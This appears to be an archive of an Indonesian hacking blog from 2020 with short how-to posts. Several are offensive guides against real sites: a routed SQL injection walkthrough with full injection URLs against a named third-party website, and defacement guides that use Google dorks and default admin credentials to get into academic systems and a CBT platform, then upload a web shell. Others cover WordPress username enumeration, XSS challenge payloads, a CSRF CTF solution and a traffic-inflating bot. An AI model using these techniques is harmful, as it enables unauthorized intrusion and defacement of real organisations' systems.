Friday, September 25, 2020

Tools Auto Visitor Your Website Or Blog

Yow Whatsap crew,
Wellcome back with me.
Kali ini gua bakal bagi tools Auto Visitor Your Website Or Blog Buatan temen gua yaitu Pausi.
Langsung aja ke tutorialnya xixi..

Bahan bahan :
- Termux
- Kouta :v
- Tools :
https://github.com/404rgr/auto-V

Step by step :
Buka Termux kalian lalu masukan command :
pkg install update
pkg install upgrade
pkg install php
pkg install git
Kalo udah kalian masukin lagi command :
git clone https://github.com/404rgr/auto-V
cd auto-V
ls
Commandnya ikutan ya jangan di bolak balik atau di ganti :D
Jika udah kayak gambar diatas kalian masukin aja command :
php auto-V.php
Nanti tampilannya kek gini :
Tinggal kalian masukin target (website atau blog yang kalian mau naikin vistornya) dan mau berapa visitor.
Dan selesai.

Sunday, September 20, 2020

3 Cara Mencari Username Admin Login Wordpress

Yow Whatsapp crew,
Wellcome back with me.
Kali ini gua mau membagikan 3 cara memcari username wordpress. Langsung aja ke caranya :v

Cara yang pertama adalah memasukan command ?author=1 pada url.
Example :
https://coba.garudamuda.co.id/wp/?author=1
*contoh aja gayn
Setelah di enter akan seperti ini :
https://coba.garudamuda.co.id/wp/author/admin/
Usernamenya adalah admin.
Engga semua website Wordpress bisa tapi kebanyakan bisa. Lanjut cara yang kedua.

Cara yang kedua adalah memasukan command /wp-json/wp/v2/users pada url.
Example :
https://coba.garudamuda.co.id/wp/wp-json/wp/v2/users
Dan akan muncul usernamenya seperti gambar di bawah.

Oke lanjut ke cara ke tiga yaitu menggunakan WPScan.
WPScan merupakan tools vulnerability scanner untuk CMS Wordpress yang ditulis dengan menggunakan bahasa pemrograman ruby, WPScan mampu mendeteksi kerentanan umum serta daftar semua plugin dan themes yang digunakan oleh sebuah website yang menggunakan CMS Wordpress.
Caranya adalah :
Buka Terminal lalu masukan command
wpscan --url http://www.target.com --enumerate u
 Atau kalian bisa liat lebih jelas di http://142bit.blogspot.com/2017/03/Brute-Force-Attack-WP-Menggunakan-WPscan.html?m=1

Segitu dulu tutorial kali ini,
Sekian dan Terima Kasih

Wednesday, June 24, 2020

XSS Chall Game

Yow whatsapp crew, 
Wellcome back with me.
Kali ini gua dapet chall xss yang lumayan gampang, kalian juga bisa cobain sendiri.

Pengertian xss :
https://www.informasi-it.com/2020/05/pengertian-bug-xss.html

Website nya :
https://mrss4nd0x.000webhostapp.com/xss.php

Bahan bahan :
- Payload xss :
"><img src=x onerror=prompt(document.domain)>
- Kouta :v
 Sebelum bahas challnya pasti ada yang nanya
"Bang, kenapa payload xssnya isi "> ?" Itu adalah salah satu bypass xss gayn.
Kalo mau tahu lebih lengkap bisa cari di google :D

Langsung aja yekan kita ke chall level 1,
Chall level 1 sangat gampang, tinggal kalian masukan payload xss lalu sumbit. Dan payload berhasil tereksekusi. Ini adalah basic dasar xss masa gini aja ga bisa :v

Kita lanjut ke Challl level 2,
"Bang, ga ada tempat sumbitnya" Iyaa kalo g ada tempat sumbitnya kalian liat url nya :
https://mrss4nd0x.000webhostapp.com/xss2.php?test=submit%20xss

Saya coba ganti kata submit xss menjadi payload xss dengan cara mengganti url yang berada dekat parameternya seperti ini :
https://mrss4nd0x.000webhostapp.com/xss2.php?test=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E

Boom paylod tereksekusi lagi. Gampang bukan? Asalkan kalian mau belajar pasti bisa.
Okk, lanjut ke Chall level 3.
Chall ke 3 ini lumayan, karna disana g ada tempat sumbit dan urlnya juga tidak memiliki parameter. Kalian coba view source dan liat code scriptnya.
Artinya search parameter adalah name atau ?name=
Kalian masukin aja parameternya seperti ini :
>>Sebelum ~
https://mrss4nd0x.000webhostapp.com/xss3.php
>>Sesudah ~
https://mrss4nd0x.000webhostapp.com/xss3.php?name=
Tinggal kalian masukin payload xss sama seperti chall ke 2.

Kita lanjut lagi ke Chall level 4,
"Bang, kok pas gua masukin payload xss trus sumbit ga ke eksekusi payloadnya?" Jelas kan makin tinggi levelnya makin susah :v

Setelah kalian masukin payload xss trus sumbit coba view source. 
Karna itu dititle gua langsung menutup tag title supaya payload tidak berada di title. 
"Gimana tuh Bang?"
Awalnya payloadnya kan :
"><img src=x onerror=prompt(document.domain)>

Langsung tutup tag title seperti ini :
</title><img src=x onerror=prompt(document.domain)>
Jadi seperti itu nanti, yang awalnya tidak berwarna karna title sekarang sudah tereksekusi. 
Kalo belom ngerti bisa tanyain di colom commenter :D

Ok, langsung kita gass ke Chall level 5
Chall yang ini hampir sama kayak Chall level 4, cuman beda tempat aja. 
Kalo chall level 4 di title sekarang di chall level 5 di script. Cara atasinnya sama aja kalian tag penutup script dulu baru payload xss seperti ini :
Sebelum :
"><img src=x onerror=prompt(document.domain)>

Sesudah :
</script><img src=x onerror=prompt(document.domain)>

Dan Payload akan tereksekusi. 
Ga kerasa udah ke Chall terakhir :v
Yaitu Chall Level 6,
Chall terakhir paling gampang :v
Kita hanya perlu mem bypassnya saja dengan menambahkan "> 

Sekian dulu materi kali ini,
and see you next time

Tuesday, June 23, 2020

Routed SQL-injection

Yow Whatsapp crew,
Wellcome back with me.
Kali ini gua bakal ngebahas Routed SQL-injection.

Bahan bahan :
- Kouta :v

Site :
http://www.jeffreycarbo.com/page.php?name=3

How to Inject
 http://www.jeffreycarbo.com/page.php?name=3 muncul error tapi jangan pedulikan hal tersebut karena itu adalah halaman normalnya

Ketika saya order by 2 muncul error http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+- tapi di order by 1 error tersebut hilang

Jadi saya union select menggunakan column 1 tersebut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+- tapi tidak terjadi apa apa karena website tersebut vuln terhadap Routed sqli, cara mengetahuinya adalah

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-  ubah 1' menjadi hex jika normal berarti vuln terhadap Routed sqli

Lanjut ke exploit tambahkan seperti berikut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+- dan anggap saja angka 1 tersebut menjadi parameter, tapi jangan sampai hilangkan " "

Lalu kalian order by lagi di parameter "1'" Seperti berikut http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'+order+by+7--+-"--+- kalian cari sampai error lalu kalian union select sepertu biasa :D

Dan hasilnya :
http://www.jeffreycarbo.com/page.php?name=3%27+and+0+/*!50000union*/+/*!50000select*/+%221+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+-%22--+-

Sekian materi kali ini,

Monday, June 22, 2020

Cara Menghilangkan ?m=1 atau ?m=0 Pada Blog

Yow Whtasapp Crew,
Wellcome Back with me.
Kali ini gua bakal ngebahas cara Menghilangkan ?m=1 atau ?m=0 Pada Blog.

Sedikit penjelasan,
kode ?m=1 merupakan tanda bahwa perangkat yang digunakan yaitu perangkat mobile, sedangkan kode ?m=0 merupakan tanda bahwa perangkat yang digunakan adalah perangkat desktop, meskipun pada kenyataannya tidak ditemui kode ?m=0 pada perangkat desktop.

Langsung aja ye kan,
Cara nya sangat gampang,
Kalian buka blogger + login ke akun kalian.
Kedua, copy script dibawah,
<script type='text/javascript'>
var uri = window.location.toString(); if (uri.indexOf("%3D","%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D")); window.history.replaceState({}, document.title, clean_uri);}var uri = window.location.toString();if (uri.indexOf("%3D%3D","%3D%3D") > 0) {var clean_uri = uri.substring(0, uri.indexOf("%3D%3D")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString(); if (uri.indexOf("&m=1","&m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("&m=1")); window.history.replaceState({}, document.title, clean_uri);}
var uri = window.location.toString();if (uri.indexOf("?m=1","?m=1") > 0) {var clean_uri = uri.substring(0, uri.indexOf("?m=1")); window.history.replaceState({}, document.title, clean_uri);}
</script>
Lalu kalian buka Tata Letak atau Layout >> add gadget >> HTML/JavaScript, lalu pastekan script diatas lalu save. Samain kayak gambar dibawah gayn.
Dan Diakhir Url blog kalian tidak ada ?m=1 atau  ?m=o lagi. Cara Hilanginnya tinggal kalian hapus aja kodenya.

Belajar CTF Part 2

Yow whatsapp,
Wellcome back with me.
Kali ini kita akan belajar ctf part 2.
Banyak banget yang request
"Bang part 2nya mana?" Wkwk maaf lama, gua nyari izin yang punya ctfnya agak susah.
Kali ini kita akan belajar ctf posts.
Seperti nama ctfnya kita disuruh mempost suatu kata di webnya.

Bahan bahan :
1. Kouta :v
2. Apk buat coding
3. Kesabaran dan Teliti

Web ctfnya :
http://app.22xploitercrew.com
*kalian buat akun dulu abistu login.
Tanks buat rands udah mau minjem web ctfnya

Setelah kalian login kalian cari ctf posts,
Selain ctf posts ada juga ctf virus image, ninja button dll.

Kalian baca ruleznya tidak boleh inspect element atau edit element
Nah kita disuruh ngepost tulisan yang ada disana, yaitu :
e4sy_flAg

Biasanya kita ngepost sesuatu tinggal klik dan tulis lalu enter, nah sekarang webnya readonly atau pas di klik ga bisa ditulis.

Nah kalo gua cara ngepostnya menggunakan bug Csrf atau Cross Site Request Foqery.

"Caranya gimana bang?"
Kita view source dulu trus check ada token atau csrf, kalo g ada berarti kalian cari form.
Trus kalian salian dari tag pembuka form sampai tag penutup.
Jika sudah kalian salin, kalian buka apk buat coding andalan kalian. Kalo gua pake apk quick edit.

Buat file dengan nama bebas dengan extensi .html dan masukan code yang udah kalian salin tadi.

Kita disuruh ngepost kata ini e4sy_flAg karna readonly kita ga bisa nulis so kita hapus aja codingan readonlynya seperti gambar dibawah ini lalu save.
Setelah kalian save kalian buka filenya di chrome atau di browser kesayangan kalian.

Lalu masukan kata yang tadi disuruh yaitu :
e4sy_flAg lalu enter.
Boom! Flagnya keluar dan tinggal di report your flag.
Kalo kalian mau gua lanjutin ctf atau sqli atau xss kalian bisa beri komentar dibawah.

Monday, June 15, 2020

Cara Deface Sistem Informasi Akademik U/P Default

Yow whatsapp, 
Wellcome back with me. 
Kali ini kita akan membahas proof of concept yang msh baru xixixi....
Yaitu Sisfo (Sistem Formasi Akademik) Default User and Pass. Bug ini terjadi karna kelalain admin. Kenapa bisa begitu? Ya karna si admin lupa untuk mengganti pass defaultnya sehingga kita bisa login ke dashboard admin menggunakan User dan Pass default. 

Bahan bahan :
- Kouta 
- Dork :
"Sisfo Login"
"Sistem Informasi Akdemik"
"Login | Sisfo"
*Kembangin lagi gayn
- Info login :
User : admin
Pass : admin
Atau
User : admin
Pass : admin123

Langsung aja :D
Pertama kalian dorking dulu menggunakan dork diatas xixi.. 

Nah akan otomatis ke halaman admin login, lalu kalian login menggunakan info login yang saya sediakan diatas... 

Jika vuln akan masuk ke dashboard admin :D
Seperti gambar dibawah ini. 

Cara Upload shellnya kalian ke bagian profil guru >> Upload shell
Lalu kalian refresh >> klik kanan pada img yang retak atau klik lama pada android >> buka gambar di tab baru.. 
Jika 403 Forbidden kalian bisa coba dengan cara di bawah ini :
Thanks to : ali

Sekian dari saya,
Always Study

Sunday, June 14, 2020

Default U/P On Cms Zya CBT

Yow Exploiter, 
Sorry gua jarang upload soalnya sibuk.
Langsung aja tanpa basa basi.

#Title : Default U/P On Cms Zya
#Dork : intext:"© achmadlutfi.wordpress.com"
#Author : Echhi atau Shandi1337
#Admin Login :
- www.echhixploit.com/index.php/manager
- www.echhixploit.com/[Path]index.php/manager
#User and Pass : admin

Kalian tinggal login ke admin login dengan user dan password diatas.
Boom berhasil login, xD
Artikel cukup singkat karna emng singkat :v
Note : Artikel ini hanya untuk pembelajaran, saya tidak bertanggung jawab jika jika ada penyalahgunaan.
Refrensi :
https://ecchiexploit.blogspot.com/2020/06/exploit-zyacbt-default-user-pass.html?m=1